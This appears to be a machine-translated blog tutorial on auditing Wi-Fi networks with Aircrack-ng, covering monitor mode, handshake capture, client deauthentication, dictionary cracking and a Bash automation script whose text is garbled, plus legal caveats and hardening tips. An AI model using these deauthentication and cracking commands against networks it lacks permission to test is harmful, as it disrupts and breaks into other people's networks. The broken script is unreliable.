Aircrack-ng: Complete guide for the audit of Wi-Fi networks in Linux

Posted onbyBlockmyIP| Category:Linux Programs

Introduction

Today, the safety of wireless networks is a critical aspect for both domestic users and IT professionals. The proliferation of IoT devices, teleworking and increasing reliance on connectivity have increased the attack surface of Wi-Fi networks. In this context,Aircrack-nghas been consolidated as one of the most powerful and versatile tools for conducting security audits in Linux environments. This article provides a comprehensive guide, from basic concepts to advanced use techniques, so that you can evaluate and strengthen the protection of your own networks in a responsible way.

What is Aircrack-ng?

Aircrack-ng is a set of command line utilities designed to detect, capture, analyse and try to break the keys to Wi-Fi networks protected with WEP, WPA, WPA2 protocols and, on an experimental basis, WPA3. The package includes specialized tools such asairmon-ng(to place the interface in monitor mode),airodump-ng(package capture),aireplay-ng(inject traffic and cause disauthentication) andaircrack-ng(cracking engine). Thanks to its modular architecture, each phase of the audit process can be run independently or chained by scripts, making it ideal for both manual testing and automation environments.

Main characteristics

  • Wide support for various types of encryption: WEP, WPA, WPA2 and WPA3 (experimental).
  • Available in the official repositories of most Linux distributions (Ubuntu, Debian, Fedora, Arch, openSUSE, etc.).
  • Light command line interface, suitable for servers, embedded systems and environments without graphic environment.
  • Large active community, extensive documentation and numerous tutorials, scripts and help forums.
  • Compatibility with a wide range of Wi-Fi adapters that support monitoring and injection of packages (Atheros, Realtek, certain Intel and Rinink chips).
  • Possibility to integrate with other tools such ashashcat, crunchorpyritfor more effective attacks by GPU or Rainbow tables.

Installation in popular Linux distributions

Before installing, check that your adapter is compatible with monitor and injection mode. You can check the compatibility list in the official Aircrack-ng wiki or runairmon-ngto see if the interface appears.

Ubuntu / Debian

  • Update the package index:sudo apt update
  • Install the main package:sudo apt install aircrack-ng
  • Optional, but recommended for compiling from sources or using specific drivers:sudo apt install linux-headers-$(uname -r) build-essential libssl-dev

Fedora

  • Install from the official repository:sudo dnf install aircrack-ng
  • For development and compilation tools:sudo dnf install kernel-devel gcc make

Arch Linux

  • Use the community repository:sudo pacman -S aircrack-ng
  • If you prefer to compile the latest version:git clone https://github.com/aircrack-ng/aircrack-ng.git, thencd aircrack-ng && make && sudo make install.

Preparation of the interface

The first step is to place the Wi-Fi card in monitor mode. Suppose your interface is calledwlan0:

  • Stop any service that may interfere with the capture:sudo airmon-ng check kill
  • Activates the monitor mode:sudo airmon-ng start wlan0
  • This will create a new interface, generallywlan0mon, ready to capture traffic.
  • Verifies the status withiwconfigYou should see. «Mode: Monitor» in the created interface.

Capture of anti-dumping-ng packages

To identify nearby networks and get the necessary handshakes, run:

  • sudo airodump-ng wlan0mon

This command will show in real time a table with BSSID, ESSID, channel, signal power and associated customers. Note the BSSID and the target network channel, for exampleAA:BB:CC:DD:EE:FFon channel 6.

Then, focus the capture on that network and save the data in a file:

  • sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w captura wlan0mon

The parameter-wdefines the prefix of the output files (captura-01.cap, captura-01.csv, etc.). While the capture is active, you need to trigger a handshake.

Handshake (WPA / WPA2)

To force the reauthentication of a client and capture the four-way handshake, useaireplay-ng:

  • sudo aireplay-ng -0 2 -a AA:BB:CC:DD:EE:FF -c CLIENT_MAC wlan0mon

The argument-0 2sends two disauthentication packages;-aspecifies the BSSID of the access point and-cthe MAC address of the target client. When the client reconnects, the handshake will be recorded in the capture file.

If you don't know a client's MAC, you can leave the field.-cempty; aireplay-ng will send disauthentication to all associated customers, increasing the probability of capturing a handshake.

Cracking key with aircracking

With the capture file containing the handshake, you can try to break the key using a dictionary:

  • sudo aircrack-ng -w /ruta/al/diccionario.txt captura-01.cap

Aircrack-ng will test every password in the dictionary against the handshake. If the key is present, it will show something like:

  • KEY FOUND! [ miClaveSecreta ]

For pure brute force attacks (not recommended for the time required), you can combine Aircrack-ng with tools likecrunchorhashcat. For example, generate a dictionary of length 8-10 withcrunch 8 10 abcdefghijklmnopqrstuvwxyz0123456789 -o wordlist.txtand then move it to Aircrack-ng.

In addition, you can specify the type of attack explicitly:

  • -a 1for WEP.
  • -a 2for WPA / WPA2.
  • -bto filter through BSSID in case of multiple catches.

Automation with scripts

For repetitive testing or multiple network audits, it is useful to create scripts that chain the phases. A basic example in Bash:

#! $CANAL --bssid $BSSID -w $OUTPUT $INTERFAZ & CAPTURE _ PID =$! # Wait a bit for the capture to start # 5 # To authenticate sudo customers aireplay-ng -0 5 -a $BSSID $_ $CAPTURE _ PID # Try crackosudo aircrack-ng -w / route / al / dictionario.txt ${OUTPUT} -01.cap

This script activates the interface, starts the capture, sends deauthentication packages and, after an interval, tries to break the key. You can expand it with log, mail notification, or integration with vulnerability management tools.

Common problem solution

  • The interface does not go into monitor mode:Verify that the driver supports this functionality and that there are no conflicts with NetworkManager or wpa _ supplicant. Usesudo airmon-ng check killto stop them.
  • No airborne-ng networks appear:Make sure the card is really in monitor mode (iwconfig) and that you are in an appropriate range; some cards have limited sensitivity.
  • Handshake is not captured:It may be due to the absence of active customers or an AP that ignores deauthentication. Try to approach the router, use a higher-gain antenna or wait for a device to connect naturally.
  • Aircrack-ng does not find the key despite having the handshake:Check that the dictionary contains the exact password; test with transformation rules (--rulesin hashcat) or combines multiple lists.
  • Permission errors:Most operations require root privileges; run commands withsudoor switch to a root session.

Ethical and legal considerations

It is essential to remember that using Aircrack-ng in networks without explicit authorization is illegal and violates computer security laws in most countries. This guide is intended exclusively for:

  • Safety audits on own networks or in those where you have written permission from the owner.
  • Controlled laboratory environments for learning and certification (e.g. OSCP, CEH, GWAPT).
  • Improve awareness of the vulnerabilities of Wi-Fi configurations and apply appropriate countermeasures.

He always works within the legal framework and respects the privacy of others.

Best practices to protect your Wi-Fi network

After testing, implement the following recommendations to strengthen security:

  • Use WPA3 encryption when available; if not, WPA2-AES with a long and random password (minimum 20 characters).
  • Disable WPS, as it can be exploited to get the PIN and derive the key.
  • Update the router firmware regularly to correct known vulnerabilities.
  • Segments the guest network and limits access to critical resources through separate VLAN or SSID.
  • Monitor traffic with tools likeWiresharkortcpdumpto detect abnormal behaviors.
  • Apply MAC address filtered as an additional layer, even if not infallible, and regularly review the list of connected devices.

Conclusion

Aircrack-ng is an essential tool for any security professional who works in Linux environments and needs to assess the resistance of their wireless networks. Its combination of utilities for monitoring, capture, injection and cracking offers a full and flexible workflow. However, their power carries a great responsibility: use it only with permission and within the limits of the law. With the knowledge acquired in this post, you will be better prepared to identify weaknesses, apply patches and keep your Wi-Fi connections safe against external threats.

This work is under aCreative Commons License Attribution 4.0 International for Francesc Roig francesc @ vivaldi.net.

EnglishenEnglishEnglish
SpanishesSpanishEspañolEnglishenEnglishEnglish